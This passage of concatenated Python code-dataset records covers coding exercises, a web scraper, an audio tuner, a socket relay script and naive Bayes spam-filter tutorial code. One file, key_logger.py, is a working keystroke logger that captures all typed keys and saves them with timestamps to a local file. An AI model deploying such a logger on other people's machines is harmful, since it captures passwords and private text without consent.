Description\n#\n# Complete the numberOfItems function in the editor below. 
The function must return an integer array that contains the results for each of the startIndices[i] and endIndices[i] pairs.\n#\n# numberOfItems has three parameters:\n#\n# s: A string to evaluate\n#\n# startIndices: An integer array, the starting indices.\n#\n# endIndices: An integer array, the ending indices.\n#\n# Constraints\n#\n# 1 ≤ m, n ≤ 10^5\n# 1 ≤ startIndices[i] ≤ endIndices[i] ≤ n\n# Each character of s is either '*' or '|'\n\nclass Solution:\n    def itemSinContainer(self, s, startIndices, noOfstartIndices, endIndices, noOfendIndices):\n        # Collect one result per (start, end) pair, as the problem statement requires\n        res = []\n\n        def count(sub):\n            parts = sub.split('|')\n            total = 0\n            for i in range(1, len(parts) - 1):\n                total += len(parts[i])\n            return total\n\n        for i, j in zip(startIndices, endIndices):\n            res.append(count(s[i - 1:j]))\n        return res\n\n\nprint(Solution().itemSinContainer('*|*|', [1], 1, [1], 1))\nprint(Solution().itemSinContainer(\"*|*|*|\", [1], 1, [6], 1))\nprint(Solution().itemSinContainer('|**|*|*', [1, 1], 2, [5, 6], 2))\n","sub_path":"src/amazon/Items in Containers.py","file_name":"Items in Containers.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"68382678","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime\nimport csv\n\nfrom itertools import count\n\ndef get_request_url(url,enc = 'utf-8'):\n    req = urllib.request.Request(url)\n\n    try:\n        response = urllib.request.urlopen(req)\n        if response.getcode() == 200:\n            try:\n                rcv = response.read()\n                ret = rcv.decode(enc)\n            except UnicodeDecodeError:\n                ret = rcv.decode(enc, 'replace')\n            return ret\n    except Exception as e:\n        print(e)\n        print(\"[%s] Error for URL : %s\" % (datetime.datetime.now(), url))\n        return None\n\n\n\ndef main():\n\n\n    url = 'https://search.shopping.naver.com/search/category.nhn?cat_id=50000167'\n    rcv_data = get_request_url(url)\n    soupData = BeautifulSoup(rcv_data, 'html.parser')\n\n    ctg1 = []\n\n    ctg1_tag = soupData.select('a._category1 em')\n    for i in range(len(ctg1_tag)):\n        ctg1.append(ctg1_tag[i].text)\n    ctg1_url = [50000000+i for i in range(11)]\n    #ctg1_dict = {i: 50000000 + ind for ind, i in enumerate(ctg1)}\n\n    ctg2 = []\n    ctg2_url = []\n\n    ctg3 = []\n    ctg3_url = []\n\n    for i in range(11):\n        url = 'https://search.shopping.naver.com/category/category.nhn?cat_id='\n\n        url = url + str(50000000+i)\n        print(url)\n        rcv_data = get_request_url(url)\n        soupData = BeautifulSoup(rcv_data, 'html.parser')\n\n\n        ctg2_tag = soupData.select('div.category_cell h3 strong')\n        for j in ctg2_tag:\n            ctg2.append(j.text)\n        ctg2_tag2 = soupData.select('div.category_cell h3 a')\n        for i in ctg2_tag2:\n            ctg2_url.append(i.get('href')[-8:])\n\n\n        ctg3_tag = soupData.select('div.category_cell ul.category_list li a')\n\n        for i in ctg3_tag:\n            if i.text=='더보기':\n                continue\n            else:\n                ctg3.append(i.text)\n                ctg3_url.append(i.get('href')[-8:])\n\n\n    #ctg2_dict = {a: b for a, b in zip(ctg2, ctg2_url)}\n    #print(ctg2_dict)\n\n    #ctg3_dict = {a: b for a, b in zip(ctg3, ctg3_url)}\n    #print(ctg3_dict)\n\n\n    dfctg1 = pd.DataFrame([(a,b) for a,b in zip(ctg1,ctg1_url)],columns=['ctg1','id'])\n    dfctg2 = pd.DataFrame([(a,b) for a,b in zip(ctg2,ctg2_url)],columns=['ctg2','id'])\n    dfctg3 = pd.DataFrame([(a, b) for a, b in zip(ctg3, ctg3_url)], columns=['ctg3', 'id'])\n\n    dfctg1.to_csv('ctg1.csv',index=False,index_label=False)\n    dfctg2.to_csv('ctg2.csv', index=False, index_label=False)\n    dfctg3.to_csv('ctg3.csv', index=False, index_label=False)\n\n\n    # ctg3_dict = {a: b for a, b in 
zip(ctg3, ctg3_url)}\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1_lpoint/3_1_외부변수_날씨,미세먼지/날씨, 미세먼지 크롤링/url읽기.py","file_name":"url읽기.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"321883413","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division, print_function, unicode_literals)\n\n__author__ = 'alexandre'\n\nclass Singleton:\n def __init__(self, klass):\n self.klass = klass\n self.instance = None\n\n def __call__(self, *args, **kwds):\n if self.instance is None:\n self.instance = self.klass(*args, **kwds)\n return self.instance\n\n","sub_path":"pt/acarlos/Singleton.py","file_name":"Singleton.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"352052304","text":"# coding: utf-8\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^process/$', views.payment_process, name='process'),\n url(r'^done/$', views.payment_done, name='done'),\n url(r'^cancel/$', views.payment_canceled, name='canceled'),\n]","sub_path":"payment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"643989511","text":"\"\"\"\r\nTask\r\n\r\nYou are given a NXM integer array matrix with space separated elements (N = rows and M = columns).\r\nYour task is to print the transpose and flatten results.\r\n\r\nInput Format\r\n\r\nThe first line contains the space separated values of N and M.\r\nThe next lines contains N the space separated elements of M columns.\r\n\r\nOutput Format\r\n\r\nFirst, print the transpose array and then print the flatten\r\n\"\"\"\r\n\r\nimport numpy as np\r\nN, M = map(int, input().split())\r\nl = []\r\nfor i in range(N):\r\n n = list(map(int, input().split()))[:M]\r\n l.append(n)\r\nx = np.array(l)\r\nprint(np.transpose(x))\r\nprint(x.flatten())\r\n","sub_path":"Transpose and Flatten.py","file_name":"Transpose and Flatten.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"133484750","text":"from pynput import keyboard\nimport time\n\nalpha = \"abcdefghijklmnopqrstuvwxyz\"\nnum = \"1234567890\"\nsym1 = \"-=[];'#,./\\\\`\"\nsym2 = {\"1\":\"!\",\"2\":\"\\\"\",\"3\":\"£\",\"4\":\"$\",\"5\":\"%\",\"6\":\"^\",\"7\":\"&\",\"8\":\"*\",\"9\":\"(\",\"0\":\")\",\"`\":\"¬\",\"-\":\"_\",\"=\":\"+\",\"[\":\"{\",\"]\":\"}\",\";\":\":\",\"'\":\"@\",\"#\":\"~\",\",\":\"<\",\".\":\">\",\"/\":\"?\",\"\\\\\":\"|\"}\n\ndef main():\n\twith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n\t\tprint(\"Press esc to quit\")\n\t\tlistener.join()\n\ndef on_press(key):\n\tglobal shift\n\tkey = str(key).strip(\"'\")\n\t\n\tif key == \"Key.space\":\n\t\tword.append(\" \")\n\n\telif key == \"Key.enter\":\n\t\tword.append(\"\\n\")\n\t\n\telif key == \"Key.esc\": \n\t\twith open(\"log.txt\", \"a\") as log:\n\t\t\tlog.write(\"\\n[@]\"+time.asctime()+\"\\n\")\n\t\t\tfor char in word:\n\t\t\t\tlog.write(char)\n\t\treturn False\n\t\n\telif key in alpha:\n\t\tword.append(key)\n\n\telif key in num:\n\t\tif shift == True:\n\t\t\tword.append(sym2[key])\n\t\t\tshift = False\n\t\telse:\n\t\t\tword.append(key)\n\t\n\telif key in sym1:\n\t\tif shift == True:\n\t\t\tword.append(sym2[key])\n\t\t\tshift = 
False\n\t\telse:\n\t\t\tword.append(key)\n\n\telif key == \"Key.shift\" or key == \"Key.shift_r\":\n\t\tshift = True\n\t\n\telse:\n\t\tword.append(\" [\"+key+\"] \")\n\ndef on_release(key):\n\treturn True\n\nif __name__ == \"__main__\":\n\tword = []\n\tshift = False\n\tmain()","sub_path":"key_logger.py","file_name":"key_logger.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"211111705","text":"\n# Image sensor exposure time 1-5000\nexposure_time = 12\n# Contrast\ncontrast = 64\n# Brightness -64-64\nbrightness = 64\n# Saturation 0-128\nsaturation = 128\n# gain 0-100\ngain = 0\n\ncam_params = {'exposure_auto':1, 'exposure_absolute':exposure_time,\n 'gain':gain,'saturation':saturation,\n 'brightness':brightness,'contrast':contrast}\n","sub_path":"cam_params.py","file_name":"cam_params.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32324020","text":"from scipy import signal\nimport threading\n\nimport pyaudio # package portaudio-devel\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom drawnow import drawnow\n\n\nclass Dsp:\n\n\n def __init__(self):\n self.notes_name = [\"do0\", \"do0# / ré0b\", \"ré0\", \"ré0# / mi0b\", \"mi0\", \"fa0\", \"fa0# / sol0b\", \"sol0\", \"sol0# / la0b\",\n \"la0\", \"la0# / si0b\", \"si0\", \"do1\", \"do1# / ré1b\", \"ré1\", \"ré1# / mi1b\", \"mi1\", \"fa1\",\n \"fa1# / sol1b\", \"sol1\", \"sol1# / la1b\", \"la1\", \"la1# / si1b\", \"si1\", \"do2\", \"do2# / ré2b\", \"ré2\",\n \"ré2# / mi2b\", \"mi2\", \"fa2\", \"fa2# / sol2b\", \"sol2\", \"sol2# / la2b\", \"la2\", \"la2# / si2b\", \"si2\",\n \"do3\", \"do3# / ré3b\", \"ré3\", \"ré3# / mi3b\", \"mi3\", \"fa3\", \"fa3# / sol3b\", \"sol3\", \"sol3# / la3b\",\n \"la3\", \"la3# / si3b\", \"si3\", \"do4\", \"do4# / ré4b\", \"ré4\", \"ré4# / mi4b\", \"mi4\", \"fa4\",\n \"fa4# / sol4b\", \"sol4\", \"sol4# / la4b\", \"la4\", \"la4# / si4b\", \"si4\", \"do5\", \"do5# / ré5b\", \"ré5\",\n \"ré5# / mi5b\", \"mi5\", \"fa5\", \"fa5# / sol5b\", \"sol5\", \"sol5# / la5b\", \"la5\", \"la5# / si5b\", \"si5\",\n \"do6\", \"do6# / ré6b\", \"ré6\", \"ré6# / mi6b\", \"mi6\", \"fa6\", \"fa6# / sol6b\", \"sol6\", \"sol6# / la6b\",\n \"la6\", \"la6# / si6b\", \"si6\", \"do7\", \"do7# / ré7b\", \"ré7\", \"ré7# / mi7b\", \"mi7\", \"fa7\",\n \"fa7# / sol7b\", \"sol7\", \"sol7# / la7b\", \"la7\", \"la7# / si7b\", \"si7\", \"do8\", \"do8# / ré8b\", \"ré8\",\n \"ré8# / mi8b\", \"mi8\", \"fa8\", \"fa8# / sol8b\", \"sol8\", \"sol8# / la8b\", \"la8\", \"la8# / si8b\", \"si8\",\n \"do9\", \"do9# / ré9b\", \"ré9\", \"ré9# / mi9b\", \"mi9\", \"fa9\", \"fa9# / sol9b\", \"sol9\", \"sol9# / la9b\",\n \"la9\", \"la9# / si9b\", \"si9\"]\n\n self.notes_frequency = [32.7, 34.65, 36.71, 38.89, 41.2, 43.65, 46.25, 49, 51.91, 55, 58.27, 61.74, 65.41, 69.3,\n 73.42, 77.78, 82.41, 87.31, 92.5, 98, 103.8, 110, 116.5, 123.5, 130.8, 138.6, 146.8, 155.6,\n 164.8, 174.6, 185, 196, 207.7, 220, 233.1, 246.9, 261.6, 277.2, 293.7, 311.1, 329.6, 349.2,\n 370, 392, 415.3, 440, 466.2, 493.9, 523.3, 554.4, 587.3, 622.3, 659.3, 698.5, 740, 784,\n 830.6, 880, 932.3, 987.8, 1046.5, 1108.7, 1174.7, 1244.5, 1318.5, 1396.9, 1480, 1568, 1661.2,\n 1760, 1864.7, 1975.5, 2093, 2217.5, 2349.3, 2489, 2637, 2793.8, 2960, 3136, 3322.4, 3520,\n 3729.3, 3951.1, 4186, 4434.9, 4698.6, 4978, 5274, 5587.7, 5919.9, 6271.9, 6644.9, 7040,\n 7458.6, 7902.1, 8372, 8869.8, 9397.3, 9956.1, 
10548, 11175, 11840, 12544, 13290, 14080,\n 14917, 15804, 16744, 17740, 18795, 19912, 21096, 22351, 23680, 25088, 26580, 28160, 29834,\n 31609]\n\n self.num_samples = 16384 # number of data points to read at a time\n self.RATE = 44100 # time resolution of the recording device (Hz)\n\n self.p = pyaudio.PyAudio() # start the PyAudio class\n self.stream = self.p.open(format=pyaudio.paInt16, channels=1, rate=self.RATE, input=True,\n frames_per_buffer=self.num_samples) # uses default input device\n\n self.frequency = []\n f = 0\n self.f_step = self.RATE / self.num_samples\n\n for i in range(0, int(self.num_samples / 2)):\n self.frequency.append(f)\n f += self.f_step\n\n self.on = True\n self.process = True\n\n self.note = \"\"\n self.note_index = 0\n self.note_right = \"\"\n self.note_left = \"\"\n\n self.closeness = 0\n self.strongestFrequency = 0\n self.intensity = 0\n self.targetFrequency = 0\n self.targetFrequency_right = 0\n self.targetFrequency_left = 0\n self.frequencies_intensities = []\n\n\n self.thread1 = threading.Thread(target=self.processAudio, args=())\n self.thread1.setDaemon(False)\n self.thread1.start()\n\n\n\n def find_nearest_index(self, array, value):\n array = np.asarray(array)\n return (np.abs(array - value)).argmin()\n\n def get_closeness(self, index, value):\n if value > self.notes_frequency[index] :\n output = abs(self.notes_frequency[index + 1] - value)\n output = (output * 100) / (self.notes_frequency[index + 1] - self.notes_frequency[index])\n output = abs(100-output)\n\n else:\n output = abs(self.notes_frequency[index - 1] - value)\n output = (output * 100) / (self.notes_frequency[index] - self.notes_frequency[index - 1])\n output = abs(100-output)*-1\n\n return output\n\n\n def make_fig(self):\n # plt.scatter(x, y) # I think you meant this\n plt.xlim((150, 600))\n plt.plot(self.frequency, self.frequencies_intensities)\n\n #\n def get_first_strongestFrequency_intensity_index(self, min_intensity):\n for i in range(1,len(self.frequencies_intensities)-1):\n if self.frequencies_intensities[i] > min_intensity:\n for j in range(i, len(self.frequencies_intensities) - 1):\n if self.frequencies_intensities[j] < min_intensity:\n return round((i+j)/2)\n\n\n\n def processAudio(self):\n # create a numpy array holding a single read of audio data\n note_number = len(self.notes_name)\n\n while self.on:\n if self.process:\n data = np.fromstring(self.stream.read(self.num_samples), dtype=np.int16)\n data_fft = np.fft.fft(data)\n # data_fft = data\n data_fft = data_fft[0:int(self.num_samples / 2)]\n self.frequencies_intensities = np.abs(data_fft)\n self.frequencies_intensities /= 32767\n # drawnow(self.make_fig)\n\n strongestFrequency_intensity_index = self.get_first_strongestFrequency_intensity_index(0.1)\n\n if strongestFrequency_intensity_index is not None:\n\n self.strongestFrequency = self.frequency[strongestFrequency_intensity_index]\n self.intensity = self.frequencies_intensities[strongestFrequency_intensity_index]\n self.note_index = self.find_nearest_index(self.notes_frequency, self.strongestFrequency)\n self.note = self.notes_name[self.note_index]\n self.closeness = self.get_closeness(self.note_index, self.strongestFrequency)\n if self.note_index > 0:\n self.note_left = self.notes_name[self.note_index-1]\n self.targetFrequency_left = self.notes_frequency[self.note_index-1]\n else:\n self.note_left = \"--\"\n self.targetFrequency_left = 0\n\n if self.note_index < note_number-1:\n self.note_right = self.notes_name[self.note_index+1]\n self.targetFrequency_right = 
self.notes_frequency[self.note_index+1]\n\n else:\n self.note_right = \"--\"\n self.targetFrequency_right = 0\n\n self.targetFrequency = self.notes_frequency[self.note_index]\n # if strongestFrequency_intensity > 400:\n # print(current_milli_time()-start)\n # plt.plot(frequencies)\n # plt.show()\n # print(data)\n\n def __del__(self):\n # close the stream gracefully\n self.on = False\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\n","sub_path":"Dsp.py","file_name":"Dsp.py","file_ext":"py","file_size_in_byte":7719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"632561047","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # use dictionary for O(n) complexity\n dict = {}\n for i in range(len(nums)):\n one = nums[i]\n two = target - one\n if((two) in dict):\n return (i, dict[two])\n else:\n dict[one] = i\n","sub_path":"LC_1_two_sum.py","file_name":"LC_1_two_sum.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"193506828","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2018 zack \n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\n\"\"\"\nimport requests\nimport time\nimport json\nimport os, sys\nimport socket\nfrom flask import Flask\nfrom flask_restful import Resource, Api\n\nhostname = '192.168.8.11' #chang to your service IP\nport = '8080' #chang to your service Port\n\ndef get():\n response = os.system('ping -c 1 ' + hostname)\n #print(response)\n if (response == 0):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((hostname, int(port)))\n if result == 0:\n sock.close()\n distance = 'http://' + hostname + ':' + port\n #print(distance)\n r = requests.get(distance)\n #print(r)\n #print(r.content)\n value = r.content.decode('utf-8')\n resp = '{\"message\":' + '\"connect\"}'\n return json.loads(value)\n else:\n resp = '{\"message\":' + '\"connect-error\" }'\n return json.loads(resp)\n else:\n resp = '{\"message\":' + '\"network-error\"}'\n #print(resp)\n json.loads(resp)\n\n\n\n#-----------------------------------------------------------------------------------------------------\n\nbind_ip = \"10.21.20.210\"\ndef main(send_port):\n send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n send_socket.connect((bind_ip,send_port))\n str_test = json.dumps(test)\n while(1):\n d = input(\"select 1(continue) or -1(go out):\")\n if d==\"-1\":\n send_socket.close()\n break\n else:\n test = get();\n d ='{\"active\":\"create\",\"cmd\":\"./subscriber -DCPSConfigFIle rtps.ini\",\"topic\":\"UPS\"}'\n print (d)\n send_socket.send(d.encode())\n str_test = str(test).split(\",\")\n for str_test in str_test:\n d='{\"send\":\"{\\\\\"from\\\\\":\\\\\"7610307082307919\\\\\",\\\\\"message\\\\\":\\\\\"'+ str_test + ' \\\\\"}\"}'\n #d = '{\"send\":\"{\\\\\"from\\\\\":\\\\\"7610307082307919\\\\\",\\\\\"message\\\\\":\\\\\"一\\\\\"}\"}'\n print (d +\"\\n\")\n send_socket.send(d.encode())\n time.sleep(1)\n print (send_socket.recv(1024))\n\nif __name__ ==\"__main__\":\n send_port = int(input(\"port \"))\n main(send_port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"152633159","text":"\"\"\"贝叶斯分类器\"\"\"\n# # 1、sklearn的贝叶斯模型\n# import numpy as np\n# from 
sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB\n#\n# X_Gau = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n# Y_Gau = np.array([1, 1, 1, 2, 2, 2])\n# X_Mul = np.random.randint(5, size=(6, 100))\n# Y_Mul = np.array([1, 2, 3, 4, 5, 6])\n# X_Ber = np.random.randint(2, size=(6, 100))\n# Y_Ber = np.array([1, 2, 3, 4, 4, 5])\n#\n# clf_Gau = GaussianNB()\n# clf_Mul = MultinomialNB()\n# clf_Ber = BernoulliNB()\n#\n# clf_Gau.fit(X_Gau, Y_Gau)\n# clf_Mul.fit(X_Mul, Y_Mul)\n# clf_Ber.fit(X_Ber, Y_Ber)\n#\n# print(clf_Gau.predict([[-0.8, -1]]))\n# clf_pf = GaussianNB()\n# clf_pf.partial_fit(X_Gau, Y_Gau, np.unique(Y_Gau))\n# print(clf_pf.predict([[-0.8, -1]]))\n# print(clf_Mul.predict(X_Mul[2:3]))\n# print(clf_Ber.predict(X_Ber[2:3]))\nimport numpy as np\n# *************===========Sample:屏蔽社区留言板的侮辱性言论===============****************\ndef load_dataSet():\n\t# postingList:单词列表\n\tpostingList = [['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n\t               ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n\t               ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n\t               ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n\t               ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n\t               ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]\n\t# classVec:标签列表,1表示侮辱性质,0表示非侮辱性质\n\tclassVec = [0, 1, 0, 1, 0, 1]\n\treturn postingList, classVec\n\ndef createVocabList(dataSet):  # 创建全部文档的词汇集\n\t# 获取所有单词的集合\n\tvocabSet = set([])\n\tfor document in dataSet:  # 对数据集中的文档分解为集合\n\t\tvocabSet = vocabSet | set(document)  # 取两个集合的并集\n\treturn list(vocabSet)\n\ndef setOfWord2Vec(vocabList, inputSet):  # 分析输入文档的词向量\n\treturnVec = [0] * len(vocabList)  # 创建一个和词汇集等长的向量,元素全部设为零\n\tfor word in inputSet:  # 对输入文档的每个词汇进行判断\n\t\tif word in vocabList:  # 如果输入文档的词在词汇表中,则对应位置的值设为1\n\t\t\treturnVec[vocabList.index(word)] = 1\n\t\telse:\n\t\t\tprint(\"the word: %s is not in my Vocabulary!\" % word)\n\treturn returnVec\n\ndef _trainNB0(trainMatrix, trainCategory):  # 训练模型1\n\tnumTrainDocs = len(trainMatrix)  # 文件数\n\tnumWords = len(trainMatrix[0])  # 单词数\n\tpAbusive = sum(trainCategory) / float(numTrainDocs)  # 代表的就是多少个侮辱性文件,与文件的总数相除就得到了侮辱性文件的出现概率\n\t# 构建单词出现的列表\n\tp0Num = np.zeros(numWords)  # [0,0,0,.....]\n\tp1Num = np.zeros(numWords)  # [0,0,0,.....]\n\t# 整个数据集单词出现的次数\n\tp0Denom = 0.0\n\tp1Denom = 0.0\n\tfor i in range(numTrainDocs):  # 遍历所有的文件,如果是侮辱性文件,就计算此侮辱性文件中出现的侮辱性单词的个数\n\t\tif trainCategory[i] == 1:\n\t\t\tp1Num += trainMatrix[i]\n\t\t\tp1Denom += sum(trainMatrix[i])\n\t\telse:\n\t\t\tp0Num += trainMatrix[i]\n\t\t\tp0Denom += sum(trainMatrix[i])\n\tp1Vect = p1Num / p1Denom\n\tp0Vect = p0Num / p0Denom\n\treturn p0Vect, p1Vect, pAbusive\n\ndef trainNB0(trainMatrix, trainCategory):  # 训练模型的优化版:优化出现概率为0、计算结果出现下溢问题\n\tnumTrainDocs = len(trainMatrix)\n\tnumWords = len(trainMatrix[0])\n\t# 因为侮辱性的被标记为了1, 所以只要把他们相加就可以得到侮辱性的有多少\n\t# 侮辱性文件的出现概率,即train_category中所有的1的个数,\n\t# 代表的就是多少个侮辱性文件,与文件的总数相除就得到了侮辱性文件的出现概率\n\tpAbusive = sum(trainCategory) / float(numTrainDocs)\n\t# 单词出现的次数\n\tp0Num = np.ones(numWords)  # 改为np.ones()是为了防止数字过小溢出\n\tp1Num = np.ones(numWords)\n\tp0Denom = 2.0\n\tp1Denom = 2.0\n\tfor i in range(numTrainDocs):\n\t\tif trainCategory[i] == 1:\n\t\t\tp1Num += trainMatrix[i]\n\t\t\tp1Denom += sum(trainMatrix[i])\n\t\telse:\n\t\t\tp0Num += trainMatrix[i]\n\t\t\tp0Denom += sum(trainMatrix[i])\n\tp1Vect = np.log(p1Num / p1Denom)  # 去Log函数\n\tp0Vect = np.log(p0Num / p0Denom)\n\treturn p0Vect, p1Vect, pAbusive\n\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n\t# 计算公式 
log(P(F1|C))+log(P(F2|C))+....+log(P(Fn|C))+log(P(C))\n\t# 使用 NumPy 数组来计算两个向量相乘的结果,这里的相乘是指对应元素相乘,即先将两个向量中的第一个元素相乘,然后将第2个元素相乘,以此类推。\n\t# 我的理解是:这里的 vec2Classify * p1Vec 的意思就是将每个词与其对应的概率相关联起来\n\t# 可以理解为 1.单词在词汇表中的条件下,文件是good 类别的概率 也可以理解为 2.在整个空间下,文件既在词汇表中又是good类别的概率\n\tp1 = sum(vec2Classify * p1Vec) + np.log(pClass1)\n\tp0 = sum(vec2Classify * p0Vec) + np.log(1.0 - pClass1)\n\tif p1 > p0:\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef bagOfWords2VecMN(vocabList, inputSet):\n\treturnVect = [0] * len(vocabList)\n\tfor word in inputSet:\n\t\tif word in vocabList:\n\t\t\treturnVect[vocabList.index(word)] += 1  # 返回的是词向量出现的累计值\n\t\telse:\n\t\t\tprint('the word: {} is not in my vocabulary'.format(word))\n\treturn returnVect\n\ndef testingNB():\n\tlistOPosts, listClasses = load_dataSet()  # 加载数据集\n\tmyVocabList = createVocabList(listOPosts)  # 创建单词集合\n\ttrainMat = []  # 计算单词是否出现,并创建数据矩阵\n\tfor postinDoc in listOPosts:\n\t\t# 返回m*len(vocab_list)的矩阵, 记录的都是0,1信息\n\t\t# 其实就是那个东西的句子向量(就是data_set里面每一行,也不算句子吧)\n\t\ttrainMat.append(setOfWord2Vec(myVocabList, postinDoc))\n\tp0V, p1V, pAb = trainNB0(np.array(trainMat), np.array(listClasses))  # 训练数据模型\n\t# 测试数据集\n\ttestEntry1 = ['love', 'my', 'dalmation']\n\tthisDoc1 = np.array(setOfWord2Vec(myVocabList, testEntry1))\n\tprint(testEntry1, 'classified as: ', classifyNB(thisDoc1, p0V, p1V, pAb))\n\ttestEntry2 = ['stupid', 'garbage']\n\tthisDoc2 = np.array(setOfWord2Vec(myVocabList, testEntry2))\n\tprint(testEntry2, 'classified as: ', classifyNB(thisDoc2, p0V, p1V, pAb))\n\n# *************===========Sample:垃圾邮件过滤===============****************\ndef textParse(bigString):  # 切分文本\n\timport re\n\tlistOfTokens = re.split(r'\\W+', bigString)  # # 使用正则表达式来切分句子,其中分隔符是除单词、数字外的任意字符串\n\tif len(listOfTokens) == 0:\n\t\tprint(listOfTokens)\n\treturn [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\ndef spamTest():  # 对贝叶斯垃圾邮件分类器进行自动化处理\n\tdocList = []\n\tclassList = []\n\tfullText = []\n\tfor i in range(1, 26):\n\t\t# 切分解析数据,并归类为1\n\t\t# 添加垃圾邮件信息\n\t\t# 这里需要做一个说明,为什么我会使用try except 来做\n\t\t# 因为我们其中有几个文件的编码格式是 windows 1252 (spam: 17.txt, ham: 6.txt...)\n\t\t# 这里其实还可以 :\n\t\t# import os\n\t\t# 然后检查 os.system(' file {}.txt'.format(i)),看一下返回的是什么\n\t\t# 如果正常能读返回的都是: ASCII text\n\t\t# 对于except需要处理的都是返回: Non-ISO extended-ASCII text, with very long lines\n\t\ttry:\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/spam/{}.txt'.format(i)).read())\n\t\texcept:\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/spam/{}.txt'.format(i), encoding='Windows 1252').read())\n\t\tdocList.append(words)\n\t\tfullText.extend(words)\n\t\tclassList.append(1)\n\t\ttry:\n\t\t\t# 添加非垃圾邮件\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/ham/{}.txt'.format(i)).read())\n\t\texcept:\n\t\t\twords = textParse(open('data/4.NaiveBayes/email/ham/{}.txt'.format(i), encoding='Windows 1252').read())\n\t\t# 切分解析数据,并归类为0\n\t\tdocList.append(words)\n\t\tfullText.extend(words)\n\t\tclassList.append(0)\n\tvocabList = createVocabList(docList)  # 创建词汇表\n\ttrainingSet = list(range(50))\n\ttestSet = []\n\tfor i in range(10):\n\t\trandIndex = int(np.random.uniform(0, len(trainingSet)))\n\t\ttestSet.append(trainingSet[randIndex])\n\t\tdel (trainingSet[randIndex])\n\ttrainMat = []\n\ttrainClasses = []\n\tfor docIndex in trainingSet:\n\t\ttrainMat.append(setOfWord2Vec(vocabList, docList[docIndex]))\n\t\ttrainClasses.append(classList[docIndex])\n\tp0V, p1V, pSpam = 
trainNB0(np.array(trainMat), np.array(trainClasses))\n\terrorCount = 0\n\tfor docIndex in testSet:\n\t\twordVector = setOfWord2Vec(vocabList, docList[docIndex])\n\t\tif classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n\t\t\terrorCount += 1\n\tprint('the errorCount is: ', errorCount)\n\tprint('the testSet length is :', len(testSet))\n\tprint('the error rate is :', float(errorCount) / len(testSet))\n\ndef testParseTest():\n\tprint(textParse(open(r' ').read()))\n\n# *************===========Sample:从个人广告中获取区域倾向===============****************\n# 解析文本为词条向量\ndef setOfWords2Vec(vocabList, inputSet):\n\treturnVec = [0] * len(vocabList)\n\tfor word in inputSet:\n\t\tif word in vocabList:\n\t\t\treturnVec[vocabList.index(word)] += 1\n\treturn returnVec\n\ndef textParse1(bigString):  # 文本解析\n\timport re\n\tlistOfTokens = re.split(r'\\W+', bigString)\n\treturn [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\ndef calcMostFreq(vocabList,fullText):\n\timport operator\n\tfreqDict={}\n\tfor token in vocabList: #遍历词汇表中的每个词\n\t\tfreqDict[token]=fullText.count(token) #统计每个词在文本中出现的次数\n\tsortedFreq=sorted(freqDict.items(),key=operator.itemgetter(1),reverse=True) #根据每个词出现的次数从高到底对字典进行排序\n\treturn sortedFreq[:30] #返回出现次数最高的30个单词\n\ndef localWords(feed1,feed0):\n\timport feedparser\n\tdocList = []\n\tclassList = []\n\tfullText = []\n\tminLen = min(len(feed1['entries']), len(feed0['entries']))\n\tfor i in range(minLen):\n\t\twordList = textParse(feed1['entries'][i]['summary'])  # 每次访问一条RSS源\n\t\tdocList.append(wordList)\n\t\tfullText.extend(wordList)\n\t\tclassList.append(1)\n\t\twordList = 